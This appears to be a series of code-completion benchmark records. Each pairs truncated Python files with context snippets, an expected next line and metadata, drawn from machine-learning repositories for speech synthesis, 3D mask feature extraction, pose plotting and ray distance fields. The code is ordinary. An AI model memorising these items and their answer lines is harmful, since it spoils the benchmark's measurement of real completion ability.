weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
])
|
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(
nn.ReLU(),
nn.Dropout(p_dropout))
for _ in range(n_layers-1):
self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
    Dilated and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
        self.hidden_channels = hidden_channels
        self.kernel_size = kernel_size
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
      # the residual output is not needed after the last layer, so it only produces skip channels
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
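      # the conditioning tensor is projected once for all layers; per-layer slices are taken inside the loop below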
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
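      # the first hidden_channels channels update the residual path; the remaining channels accumulate into the skip output (the last layer is skip-only)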
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
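# residual block built from weight-normalized dilated 1D convolutions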
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
]) | self.convs1.apply(init_weights) | 1 | 2023-10-30 04:40:19+00:00 | 4k |
OpenMask3D/openmask3d | openmask3d/mask_features_computation/features_extractor.py | [
{
"identifier": "Camera",
"path": "openmask3d/data/load.py",
"snippet": "class Camera:\n def __init__(self, \n intrinsic_path, \n intrinsic_resolution, \n poses_path, \n depths_path, \n extension_depth, \n depth_scale):\n self.intrinsic = np.loadtxt(intrinsic_path)[:3, :3]\n self.intrinsic_original_resolution = intrinsic_resolution\n self.poses_path = poses_path\n self.depths_path = depths_path\n self.extension_depth = extension_depth\n self.depth_scale = depth_scale\n \n def get_adapted_intrinsic(self, desired_resolution):\n '''Get adjusted camera intrinsics.'''\n if self.intrinsic_original_resolution == desired_resolution:\n return self.intrinsic\n \n resize_width = int(math.floor(desired_resolution[1] * float(\n self.intrinsic_original_resolution[0]) / float(self.intrinsic_original_resolution[1])))\n \n adapted_intrinsic = self.intrinsic.copy()\n adapted_intrinsic[0, 0] *= float(resize_width) / float(self.intrinsic_original_resolution[0])\n adapted_intrinsic[1, 1] *= float(desired_resolution[1]) / float(self.intrinsic_original_resolution[1])\n adapted_intrinsic[0, 2] *= float(desired_resolution[0] - 1) / float(self.intrinsic_original_resolution[0] - 1)\n adapted_intrinsic[1, 2] *= float(desired_resolution[1] - 1) / float(self.intrinsic_original_resolution[1] - 1)\n return adapted_intrinsic\n \n def load_poses(self, indices):\n path = os.path.join(self.poses_path, str(0) + '.txt')\n shape = np.linalg.inv(np.loadtxt(path))[:3, :].shape\n poses = np.zeros((len(indices), shape[0], shape[1]))\n for i, idx in enumerate(indices):\n path = os.path.join(self.poses_path, str(idx) + '.txt')\n poses[i] = np.linalg.inv(np.loadtxt(path))[:3, :]\n return poses\n \n def load_depth(self, idx, depth_scale):\n depth_path = os.path.join(self.depths_path, str(idx) + self.extension_depth)\n sensor_depth = imageio.v2.imread(depth_path) / depth_scale\n return sensor_depth"
},
{
"identifier": "InstanceMasks3D",
"path": "openmask3d/data/load.py",
"snippet": "class InstanceMasks3D:\n def __init__(self, masks_path):\n self.masks = torch.load(masks_path)\n self.num_masks = self.masks.shape[1]"
},
{
"identifier": "Images",
"path": "openmask3d/data/load.py",
"snippet": "class Images:\n def __init__(self, \n images_path, \n extension, \n indices):\n self.images_path = images_path\n self.extension = extension\n self.indices = indices\n self.images = self.load_images(indices)\n \n def load_images(self, indices):\n images = []\n for idx in indices:\n img_path = os.path.join(self.images_path, str(idx) + self.extension)\n images.append(Image.open(img_path).convert(\"RGB\"))\n return images\n def get_as_np_list(self):\n images = []\n for i in range(len(self.images)):\n images.append(np.asarray(self.images[i]))\n return images"
},
{
"identifier": "PointCloud",
"path": "openmask3d/data/load.py",
"snippet": "class PointCloud:\n def __init__(self, \n point_cloud_path):\n pcd = o3d.io.read_point_cloud(point_cloud_path)\n self.points = np.asarray(pcd.points)\n self.num_points = self.points.shape[0]\n \n def get_homogeneous_coordinates(self):\n return np.append(self.points, np.ones((self.num_points,1)), axis = -1)"
},
{
"identifier": "get_number_of_images",
"path": "openmask3d/data/load.py",
"snippet": "def get_number_of_images(poses_path):\n i = 0\n while(os.path.isfile(os.path.join(poses_path, str(i) + '.txt'))): i += 1\n return i"
},
{
"identifier": "initialize_sam_model",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def initialize_sam_model(device, sam_model_type, sam_checkpoint):\n sam = sam_model_registry[sam_model_type](checkpoint=sam_checkpoint)\n sam.to(device)\n predictor_sam = SamPredictor(sam) \n return predictor_sam"
},
{
"identifier": "mask2box_multi_level",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def mask2box_multi_level(mask: torch.Tensor, level, expansion_ratio):\n x1, y1, x2 , y2 = mask2box(mask)\n if level == 0:\n return x1, y1, x2 , y2\n shape = mask.shape\n x_exp = int(abs(x2- x1)*expansion_ratio) * level\n y_exp = int(abs(y2-y1)*expansion_ratio) * level\n return max(0, x1 - x_exp), max(0, y1 - y_exp), min(shape[1], x2 + x_exp), min(shape[0], y2 + y_exp)"
},
{
"identifier": "run_sam",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def run_sam(image_size, num_random_rounds, num_selected_points, point_coords, predictor_sam):\n best_score = 0\n best_mask = np.zeros_like(image_size, dtype=bool)\n \n point_coords_new = np.zeros_like(point_coords)\n point_coords_new[:,0] = point_coords[:,1]\n point_coords_new[:,1] = point_coords[:,0]\n \n # Get only a random subsample of them for num_random_rounds times and choose the mask with highest confidence score\n for i in range(num_random_rounds):\n np.random.shuffle(point_coords_new)\n masks, scores, logits = predictor_sam.predict(\n point_coords=point_coords_new[:num_selected_points],\n point_labels=np.ones(point_coords_new[:num_selected_points].shape[0]),\n multimask_output=False,\n ) \n if scores[0] > best_score:\n best_score = scores[0]\n best_mask = masks[0]\n \n return best_mask"
}
] | import clip
import numpy as np
import imageio
import torch
import os
from tqdm import tqdm
from openmask3d.data.load import Camera, InstanceMasks3D, Images, PointCloud, get_number_of_images
from openmask3d.mask_features_computation.utils import initialize_sam_model, mask2box_multi_level, run_sam | 3,157 | visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
            mask = (projected_points_not_norm[:, 2] != 0) # skip the division for points whose third coordinate is zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
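        # rank views for each mask by how many of its points they see (most visible points first)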
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops
|
class PointProjector:
def __init__(self, camera: Camera,
point_cloud: PointCloud,
masks: InstanceMasks3D,
vis_threshold,
indices):
self.vis_threshold = vis_threshold
self.indices = indices
self.camera = camera
self.point_cloud = point_cloud
self.masks = masks
self.visible_points_in_view_in_mask, self.visible_points_view, self.projected_points, self.resolution = self.get_visible_points_in_view_in_mask()
def get_visible_points_view(self):
# Initialization
vis_threshold = self.vis_threshold
indices = self.indices
depth_scale = self.camera.depth_scale
poses = self.camera.load_poses(indices)
X = self.point_cloud.get_homogeneous_coordinates()
n_points = self.point_cloud.num_points
depths_path = self.camera.depths_path
resolution = imageio.imread(os.path.join(depths_path, '0.png')).shape
height = resolution[0]
width = resolution[1]
intrinsic = self.camera.get_adapted_intrinsic(resolution)
projected_points = np.zeros((len(indices), n_points, 2), dtype = int)
visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
            mask = (projected_points_not_norm[:, 2] != 0) # skip the division for points whose third coordinate is zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
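        # rank views for each mask by how many of its points they see (most visible points first)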
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops | x1, y1, x2, y2 = mask2box_multi_level(torch.from_numpy(best_mask), level, multi_level_expansion_ratio) | 6 | 2023-10-31 14:58:50+00:00 | 4k |
nv-tlabs/vid2player3d | poselib/poselib/visualization/tests/test_plotter.py | [
{
"identifier": "BasePlotterTask",
"path": "poselib/poselib/visualization/core.py",
"snippet": "class BasePlotterTask(object):\n _task_name: str # unique name of the task\n _task_type: str # type of the task is used to identify which callable\n\n def __init__(self, task_name: str, task_type: str) -> None:\n self._task_name = task_name\n self._task_type = task_type\n\n @property\n def task_name(self):\n return self._task_name\n\n @property\n def task_type(self):\n return self._task_type\n\n def get_scoped_name(self, name):\n return self._task_name + \"/\" + name\n\n def __iter__(self):\n \"\"\"Should override this function to return a list of task primitives\n \"\"\"\n raise NotImplementedError"
},
{
"identifier": "BasePlotterTasks",
"path": "poselib/poselib/visualization/core.py",
"snippet": "class BasePlotterTasks(object):\n def __init__(self, tasks) -> None:\n self._tasks = tasks\n\n def __iter__(self):\n for task in self._tasks:\n yield from task"
},
{
"identifier": "Matplotlib3DPlotter",
"path": "poselib/poselib/visualization/plt_plotter.py",
"snippet": "class Matplotlib3DPlotter(BasePlotter):\n _fig: plt.figure # plt figure\n _ax: p3.Axes3D # plt 3d axis\n # stores artist objects for each task (task name as the key)\n _artist_cache: Dict[str, Any]\n # callables for each task primitives\n _create_impl_callables: Dict[str, Callable]\n _update_impl_callables: Dict[str, Callable]\n\n def __init__(self, task: \"BasePlotterTask\") -> None:\n self._fig = plt.figure()\n self._ax = p3.Axes3D(self._fig)\n self._artist_cache = {}\n\n self._create_impl_callables = {\n \"Draw3DLines\": self._lines_create_impl,\n \"Draw3DDots\": self._dots_create_impl,\n \"Draw3DTrail\": self._trail_create_impl,\n }\n self._update_impl_callables = {\n \"Draw3DLines\": self._lines_update_impl,\n \"Draw3DDots\": self._dots_update_impl,\n \"Draw3DTrail\": self._trail_update_impl,\n }\n self._init_lim()\n super().__init__(task)\n\n @property\n def ax(self):\n return self._ax\n\n @property\n def fig(self):\n return self._fig\n\n def show(self):\n plt.show()\n\n def _min(self, x, y):\n if x is None:\n return y\n if y is None:\n return x\n return min(x, y)\n\n def _max(self, x, y):\n if x is None:\n return y\n if y is None:\n return x\n return max(x, y)\n\n def _init_lim(self):\n self._curr_x_min = None\n self._curr_y_min = None\n self._curr_z_min = None\n self._curr_x_max = None\n self._curr_y_max = None\n self._curr_z_max = None\n\n def _update_lim(self, xs, ys, zs):\n self._curr_x_min = self._min(np.min(xs), self._curr_x_min)\n self._curr_y_min = self._min(np.min(ys), self._curr_y_min)\n self._curr_z_min = self._min(np.min(zs), self._curr_z_min)\n self._curr_x_max = self._max(np.max(xs), self._curr_x_max)\n self._curr_y_max = self._max(np.max(ys), self._curr_y_max)\n self._curr_z_max = self._max(np.max(zs), self._curr_z_max)\n\n def _set_lim(self):\n if not (\n self._curr_x_min is None\n or self._curr_x_max is None\n or self._curr_y_min is None\n or self._curr_y_max is None\n or self._curr_z_min is None\n or self._curr_z_max is None\n ):\n self._ax.set_xlim3d(self._curr_x_min, self._curr_x_max)\n self._ax.set_ylim3d(self._curr_y_min, self._curr_y_max)\n self._ax.set_zlim3d(self._curr_z_min, self._curr_z_max)\n self._init_lim()\n\n @staticmethod\n def _lines_extract_xyz_impl(index, lines_task):\n return lines_task[index, :, 0], lines_task[index, :, 1], lines_task[index, :, 2]\n\n @staticmethod\n def _trail_extract_xyz_impl(index, trail_task):\n return (\n trail_task[index : index + 2, 0],\n trail_task[index : index + 2, 1],\n trail_task[index : index + 2, 2],\n )\n\n def _lines_create_impl(self, lines_task):\n color = lines_task.color\n self._artist_cache[lines_task.task_name] = [\n self._ax.plot(\n *Matplotlib3DPlotter._lines_extract_xyz_impl(i, lines_task),\n color=color,\n linewidth=lines_task.line_width,\n alpha=lines_task.alpha\n )[0]\n for i in range(len(lines_task))\n ]\n\n def _lines_update_impl(self, lines_task):\n lines_artists = self._artist_cache[lines_task.task_name]\n for i in range(len(lines_task)):\n artist = lines_artists[i]\n xs, ys, zs = Matplotlib3DPlotter._lines_extract_xyz_impl(i, lines_task)\n artist.set_data(xs, ys)\n artist.set_3d_properties(zs)\n if lines_task.influence_lim:\n self._update_lim(xs, ys, zs)\n\n def _dots_create_impl(self, dots_task):\n color = dots_task.color\n self._artist_cache[dots_task.task_name] = self._ax.plot(\n dots_task[:, 0],\n dots_task[:, 1],\n dots_task[:, 2],\n c=color,\n linestyle=\"\",\n marker=\".\",\n markersize=dots_task.marker_size,\n alpha=dots_task.alpha,\n )[0]\n\n def _dots_update_impl(self, 
dots_task):\n dots_artist = self._artist_cache[dots_task.task_name]\n dots_artist.set_data(dots_task[:, 0], dots_task[:, 1])\n dots_artist.set_3d_properties(dots_task[:, 2])\n if dots_task.influence_lim:\n self._update_lim(dots_task[:, 0], dots_task[:, 1], dots_task[:, 2])\n\n def _trail_create_impl(self, trail_task):\n color = trail_task.color\n trail_length = len(trail_task) - 1\n self._artist_cache[trail_task.task_name] = [\n self._ax.plot(\n *Matplotlib3DPlotter._trail_extract_xyz_impl(i, trail_task),\n color=trail_task.color,\n linewidth=trail_task.line_width,\n alpha=trail_task.alpha * (1.0 - i / (trail_length - 1))\n )[0]\n for i in range(trail_length)\n ]\n\n def _trail_update_impl(self, trail_task):\n trails_artists = self._artist_cache[trail_task.task_name]\n for i in range(len(trail_task) - 1):\n artist = trails_artists[i]\n xs, ys, zs = Matplotlib3DPlotter._trail_extract_xyz_impl(i, trail_task)\n artist.set_data(xs, ys)\n artist.set_3d_properties(zs)\n if trail_task.influence_lim:\n self._update_lim(xs, ys, zs)\n\n def _create_impl(self, task_list):\n for task in task_list:\n self._create_impl_callables[task.task_type](task)\n self._draw()\n\n def _update_impl(self, task_list):\n for task in task_list:\n self._update_impl_callables[task.task_type](task)\n self._draw()\n\n def _set_aspect_equal_3d(self):\n xlim = self._ax.get_xlim3d()\n ylim = self._ax.get_ylim3d()\n zlim = self._ax.get_zlim3d()\n\n xmean = np.mean(xlim)\n ymean = np.mean(ylim)\n zmean = np.mean(zlim)\n\n plot_radius = max(\n [\n abs(lim - mean_)\n for lims, mean_ in ((xlim, xmean), (ylim, ymean), (zlim, zmean))\n for lim in lims\n ]\n )\n\n self._ax.set_xlim3d([xmean - plot_radius, xmean + plot_radius])\n self._ax.set_ylim3d([ymean - plot_radius, ymean + plot_radius])\n self._ax.set_zlim3d([zmean - plot_radius, zmean + plot_radius])\n\n def _draw(self):\n self._set_lim()\n self._set_aspect_equal_3d()\n self._fig.canvas.draw()\n self._fig.canvas.flush_events()\n plt.pause(0.00001)"
},
{
"identifier": "Draw3DDots",
"path": "poselib/poselib/visualization/simple_plotter_tasks.py",
"snippet": "class Draw3DDots(DrawXDDots):\n @property\n def dim(self):\n return 3"
},
{
"identifier": "Draw3DLines",
"path": "poselib/poselib/visualization/simple_plotter_tasks.py",
"snippet": "class Draw3DLines(DrawXDLines):\n @property\n def dim(self):\n return 3"
}
] | from typing import cast
from ..core import BasePlotterTask, BasePlotterTasks
from ..plt_plotter import Matplotlib3DPlotter
from ..simple_plotter_tasks import Draw3DDots, Draw3DLines
import matplotlib.pyplot as plt
import numpy as np | 2,517 |
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2])
|
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2]) | plotter = Matplotlib3DPlotter(cast(BasePlotterTask, task3)) | 0 | 2023-10-30 20:43:43+00:00 | 4k |
vLAR-group/RayDF | run_mv.py | [
{
"identifier": "config_parser",
"path": "config.py",
"snippet": "def config_parser():\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True,\n help='config file path')\n parser.add_argument(\"--eval_only\", action='store_true',\n help='only evaluation with pretrained model')\n\n # parameterization options\n parser.add_argument(\"--radius\", type=float, default=1.5,\n help='radius of sphere for distance field')\n\n # training options\n parser.add_argument(\"--N_rand\", type=int, default=8192,\n help='batch size')\n parser.add_argument(\"--N_iters\", type=int, default=100000,\n help='number of epochs')\n parser.add_argument(\"--lrate\", type=float, default=1e-4,\n help='learning rate')\n\n # classifier options\n parser.add_argument(\"--dist_thres\", type=float, default=1e-2,\n help='threshold to determine if the query point is occluded for the sampled view')\n parser.add_argument(\"--vis_thres\", type=float, default=0.5,\n help='threshold for binary classification')\n parser.add_argument(\"--netdepth_cls\", type=int, default=8,\n help='layers in visibilit classifier')\n parser.add_argument(\"--netwidth_cls\", type=int, default=512,\n help='channels per layer')\n parser.add_argument(\"--ext_layer_cls\", type=int, default=1,\n help='number of layers to extract individual features')\n parser.add_argument(\"--pos_weight\", type=float, default=1.,\n help='positive weight for cross-entropy loss')\n\n # multiview optimization options\n 